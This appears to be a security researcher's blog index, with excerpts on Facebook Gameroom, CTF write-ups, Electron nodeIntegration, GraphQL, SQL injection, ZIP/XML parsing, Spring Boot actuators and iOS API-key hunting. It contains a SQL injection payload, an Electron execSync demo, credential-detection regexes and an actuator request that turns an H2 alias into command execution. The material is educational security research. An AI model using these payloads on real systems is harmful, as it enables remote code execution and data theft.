Late last year, I was invited to Facebook's Bountycon event, an invitation-only application security conference with a live-hacking segment. Although participants could submit vulnerabilities for any Facebook asset, we were encouraged to focus on Facebook Gaming. Having previously tested Facebook's assets, I knew it was going to be a tough challenge. Their security controls have only gotten stronger over the years – even simple vulnerabilities such as cross-site scripting are hard to come by, which is why they pay out so much for them. As such, top white hat hackers tend to approach Facebook from a third-party software angle, such as Orange Tsai's well-known MobileIron MDM exploits.
Given my limited time (I also started late due to an administrative issue), I decided to stay away from full-scale vulnerability research and focused on simple audits of Facebook Gaming's access controls. However, both the mobile and web applications were well-secured, as one would expect. After a bit of digging, I came across Facebook Gameroom, a Windows-native client for playing Facebook games. I embarked on an illuminating journey of applying offensive reverse engineering to a native desktop application.
GovTech's Cyber Security Group recently organised the STACK the Flags Cybersecurity Capture-the-Flag (CTF) competition from 4th to 6th December 2020. For the web domain, my team wanted to build challenges that addressed real-world issues we have encountered during penetration testing of government web applications and commercial off-the-shelf products.
From my experience, a significant number of vulnerabilities arise from developers' lack of familiarity with third-party libraries that they use in their code. If these libraries are compromised by malicious actors or applied in an insecure manner, developers can unknowingly introduce devastating weaknesses in their applications. The SolarWinds supply chain attack is a prime example of this.
I recently participated in FireEye's seventh annual Flare-On Challenge, a reverse engineering and malware analysis Capture The Flag (CTF) competition. Out of the 11 challenges ranging from typical executables to games written in exotic programming languages, I liked Challenge 7 the best. It featured a network traffic capture of a security breach with two stages. Having mostly worked in the red team, I enjoyed the opportunity to investigate Metasploit internals and shellcode from the perspective of a blue team.
As a beginner in malware analysis, I often found myself confused by tutorials that went from A to Z without explaining the thought process or tools used to get there. I hope that my detailed walkthrough of challenge 7 will be useful for other newcomers.
Last month, the Centre for Strategic Infocomm Technologies (CSIT) invited local cybersecurity enthusiasts to tackle the InfoSecurity Challenge (TISC). The Challenge was organized in a capture-the-flag format, with six cybersecurity and programming challenges of increasing difficulty, unlocked one after another.
On New Year’s Eve, hackers from the PALINDROME group launched a ransomware attack on a major finance company and encrypted some of its critical data servers. Your mission is to complete a series of tasks to recover as much data as possible to prevent the company from having to give in to PALINDROME's demand. The tasks will increase in difficulty as you go along so be prepared to put up the fight of your life.
With this exciting introduction, I tackled a series of difficult problems that encompassed reverse engineering, binary exploitation, and cryptography. This took me far out of my comfort zone of application security, but since I wanted to build my skills in those areas, it was a welcome challenge.
As with any modern convenience, there are tradeoffs. On the security side of things, moving routing and templating logic to the client side makes it easier for attackers to discover unused API endpoints, unobfuscated secrets, and more. Check out Webpack Exploder, a tool I wrote that decompiles Webpacked React applications into their original source code.
With the source code, attackers can search for client-side vulnerabilities and escalate them to code execution. No funky buffer overflows needed – Electron's nodeIntegration setting puts applications one XSS away from popping calc.
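To make that concrete, here is a minimal TypeScript sketch (illustrative, not taken from any particular Electron app): with `nodeIntegration` enabled, any script that an attacker injects into the renderer via XSS can reach Node.js APIs directly, so the classic proof of concept is spawning an arbitrary process.

```typescript
// With nodeIntegration enabled, renderer scripts can require Node
// modules. Attacker-controlled markup that executes JavaScript
// (e.g. an injected <img onerror=...> handler) runs with the same
// privileges as this snippet.
import { execSync } from 'child_process';

// A real payload might launch calc.exe; here we run a harmless
// command to demonstrate arbitrary process execution.
const output = execSync('echo pwned').toString().trim();
console.log(output);
```

This is why Electron's security guidelines recommend disabling `nodeIntegration` and enabling context isolation, so an XSS bug stays an XSS bug instead of becoming remote code execution.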
GraphQL is a modern query language for Application Programming Interfaces (APIs). Supported by Facebook and the GraphQL Foundation, GraphQL grew quickly and has entered the early majority phase of the technology adoption cycle, with major industry players like Shopify, GitHub and Amazon coming on board.
As with the rise of any new technology, using GraphQL came with growing pains, especially for developers who were implementing GraphQL for the first time. While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.
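As a hypothetical sketch of the access control problem (the resolver and context shapes below are illustrative, not from any particular API): since every GraphQL field is served through a single endpoint, the per-route authorization that REST developers rely on must instead be enforced inside each resolver, and one forgotten check exposes that field to every caller.

```typescript
// Illustrative request context; a missing check like the one noted
// below is the typical GraphQL access control bug.
interface Context {
  userId: string;
  isAdmin: boolean;
}

const resolvers = {
  Query: {
    // Authorization enforced inside the resolver: callers may only
    // fetch their own record unless they are admins.
    user(_parent: unknown, args: { id: string }, ctx: Context) {
      if (args.id !== ctx.userId && !ctx.isAdmin) {
        throw new Error('Forbidden');
      }
      return { id: args.id };
    },
    // A resolver that omitted the check above would happily serve
    // any user's record to any authenticated caller.
  },
};
```

The fragility is that the check lives in application code rather than in routing configuration, so it must be repeated correctly for every sensitive field.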
Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities.
Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response.
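A minimal sketch of why concatenation is injectable while placeholders are not (illustrative function names, no particular database assumed): an injected quote terminates the string literal, and the rest of the input becomes part of the SQL grammar itself, whereas a parameterized query sends the value to the driver separately so it can never change the statement's shape.

```typescript
// Unsafe: the user-supplied value is spliced into the SQL text.
function unsafeQuery(username: string): string {
  return `SELECT * FROM users WHERE name = '${username}'`;
}

// Safer pattern (sketch): statement and value travel separately;
// the driver binds the value without reparsing the query.
function safeQuery(username: string): { sql: string; params: string[] } {
  return { sql: 'SELECT * FROM users WHERE name = ?', params: [username] };
}

const payload = "' OR '1'='1";
console.log(unsafeQuery(payload));
// The quote closes the literal and the predicate becomes always-true:
//   SELECT * FROM users WHERE name = '' OR '1'='1'
```

The same payload passed to `safeQuery` stays inert: it is just a bound string value, never SQL.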
While researching a bug bounty target, I came across a web application that processed a custom file type. Let's call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.
This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:
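The exact entries vary from document to document, but the listing typically looks something like this (illustrative output):

```
Archive:  Document.docx
  inflating: [Content_Types].xml
  inflating: _rels/.rels
  inflating: word/document.xml
  inflating: word/_rels/document.xml.rels
  inflating: word/styles.xml
  inflating: docProps/app.xml
  inflating: docProps/core.xml
```

Here, word/document.xml holds the document's actual contents, while [Content_Types].xml describes the parts of the package.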
Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.
However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats, and the responsibility for handling them safely falls on XML and ZIP parsers. Unfortunately, this rarely happens, especially when developers simply use the default settings.
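On the ZIP side, the classic feature-turned-vulnerability is "zip slip": entry names may contain relative paths like ../../etc/passwd, and an extractor that joins entry names to a destination directory without validation writes files outside it. A hedged TypeScript sketch of a guard (the helper is hypothetical, not from any specific library):

```typescript
import * as path from 'path';

// Hypothetical guard against "zip slip": resolve the archive entry
// name against the destination directory and refuse anything whose
// final path escapes it.
function safeJoin(destDir: string, entryName: string): string {
  const base = path.resolve(destDir);
  const resolved = path.resolve(base, entryName);
  if (resolved !== base && !resolved.startsWith(base + path.sep)) {
    throw new Error(`Blocked path traversal in entry: ${entryName}`);
  }
  return resolved;
}
```

The XML analogue is external entity expansion (XXE), where a parser that resolves entities by default can be coaxed into reading local files; hardened configurations disable entity resolution entirely.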
The Spring Boot framework is one of the most popular Java-based microservice frameworks, helping developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process.
However, these development defaults can become dangerous in the hands of inexperienced developers. My write-up expands on the work of Michal Stepankin, who researched ways to exploit exposed actuators in Spring Boot 1.x and achieve RCE via deserialization. I provide an updated RCE method via Spring Boot 2.x's default HikariCP database connection pool and a common Java development database, the H2 Database Engine. I also created a sample Spring Boot application based on Spring Boot's default tutorial application to demonstrate the exploit.
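At a high level, this class of attack looks like the sketch below (a hedged illustration of the technique, not the exact requests from the write-up, and assuming the env and restart actuator endpoints are exposed): the attacker repoints HikariCP's connection test query at an H2 statement that defines a Java-backed alias, which executes when the connection pool is rebuilt.

```
POST /actuator/env HTTP/1.1
Content-Type: application/json

{
  "name": "spring.datasource.hikari.connection-test-query",
  "value": "CREATE ALIAS EXEC AS 'String exec(String cmd) throws Exception { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next(); }'"
}

POST /actuator/restart HTTP/1.1
```

None of this requires a bug in Spring Boot itself; it chains together development conveniences (writable environment properties, an in-memory H2 database, a restartable context) that were never meant to be reachable in production.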
Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it's also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.
Most iOS applications use third-party APIs and SDKs such as Twitter, Amazon Web Services, and so on. Interacting with these APIs requires API keys, which are used (and thus stored) in the app itself. A careless developer could easily leak keys with too many privileges or keys that were never meant to be stored on the client side in the first place.
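As a sketch of what that hunt can look like (the scanner below is hypothetical; the patterns are well-known public key formats, not secrets from any real app): after extracting printable strings from the app binary, you can match them against the formats of common credential types, such as AWS access key IDs.

```typescript
// Hypothetical scanner: match strings extracted from an app binary
// against well-known credential formats. Patterns are illustrative
// and not exhaustive.
const keyPatterns: Array<[string, RegExp]> = [
  ['AWS access key ID', /\bAKIA[0-9A-Z]{16}\b/],
  ['Google API key', /\bAIza[0-9A-Za-z_\-]{35}\b/],
  ['Generic api_key assignment', /api[_-]?key["'\s:=]+[0-9A-Za-z_\-]{16,}/i],
];

function findKeys(strings: string[]): string[] {
  const hits: string[] = [];
  for (const s of strings) {
    for (const [label, pattern] of keyPatterns) {
      if (pattern.test(s)) hits.push(`${label}: ${s}`);
    }
  }
  return hits;
}
```

In practice the input would come from running a strings-extraction tool over the decrypted app binary and bundled plist or JSON configuration files.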